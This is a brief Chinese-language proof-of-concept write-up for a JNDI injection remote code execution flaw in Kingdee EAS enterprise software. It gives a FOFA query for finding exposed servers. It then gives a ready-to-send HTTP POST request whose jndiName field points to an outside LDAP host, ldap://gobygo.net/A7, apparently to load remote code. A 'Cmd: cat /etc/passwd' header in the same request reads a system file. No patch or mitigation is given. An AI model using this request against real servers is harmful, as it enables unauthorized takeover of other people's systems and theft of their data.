0x01 产品简介
金蝶 EAS 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。
0x02 漏洞概述
金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。
0x03 测绘语句
fofa: app="Kingdee-EAS"
0x04 漏洞复现
POST /appmonitor//protect/datasource/createDataSource HTTP/1.1
Host:
Cmd: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Referer: https://xxxx
name=1234&jndiName=ldap://gobygo.net/A7&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=asdasxasx&userName=asdasxasx&password=asdasxasx&repassword=asdasxasx&connectionURL=sdasd&driverClassName=java.lang.String&testCommand=